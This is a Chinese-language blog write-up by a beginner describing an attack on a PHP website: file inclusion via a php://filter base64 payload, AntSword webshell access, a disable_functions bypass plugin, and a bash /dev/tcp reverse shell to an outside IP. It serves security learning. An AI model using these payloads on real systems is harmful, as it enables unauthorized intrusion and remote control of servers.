文件包含漏洞利用到绕过disable_function

目标:​​​​​​http://115.126.12.38:90/

当我打开这个网站发现空白界面什么都莫得有(就先随便看看吧),先右击查看一下源代码,我们发现出现#<!---- cat robots-back-hack.bak ----!>#,

试着去访问一下,发现可以下载,成功下载之后发现了两个禁止访问的目录,那么我们试着去使用7kb来进行扫描一下目录

通过扫描发现一个www.tar.gz的压缩包,我拿到linux服务器进行解压,查看,下面就是整个压缩包里面的文件了

下一步我查看backeropena.php文件,只要是稍微懂点代码的人都清楚,这里存在包含漏洞(本本地包含漏洞)

我试着去访问一下这个文件,物理路径爆出来了,那么我们试着使用php协议进行读取他的index.php首页文件看看,

php://filter/read=convert.base64-encode/resource=/www/wwwroot/115.126.12.38/index.php

 已经读取出来了,beas加密,拿出来神器进行解码一下,不解码不知道,解开之后下一跳,这尼玛不就是shell嘛。。。。。,突然佩服命名shell的那位大佬了,(给祖师爷上香!!!)

我就这样稀里糊涂的拿到了shell,使用蚁剑进行连接,执行命令看看是什么权限

执行不了命令,查看一下phpinfo,发现函数都给禁用了。。。。

接下来得绕过disable_function才能进行下一步操作,找了好久,发现蚁剑的插件市场有的大佬写好的绕过工具,我得赶紧去试试哈哈哈嗝。

他成了,他成了,他迈着成功的步伐走来了!!!(总的来说,感谢大佬写的插件)

下一步当然是反弹shell了,

1.nc -vvlp 7777   监听

2.bash -c 'exec bash -i &>/dev/tcp/182.42.122.253/7777 <&1'  反弹

成功反弹shell


但是虽然能执行命令,但并不是root权限,还得想办法提权啊

我尝试了sudo提权,suid提权,命令(find等)提权,全部失败。。。

这篇文章是我第一次发表,也希望大佬嘴下留情,刚入安全圈没多久的小菜鸡,正怀着一颗炽热的心往前奔跑,这篇文章是我自己搭建的靶场,也也是在真实环境中遇到过类似的情况。

                                                                                                

                                                                                          MHcloud一个对安全充满憧憬的小菜鸡

                                                                  

 

 

 

 

 

 

 

 

 

 

 

 

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值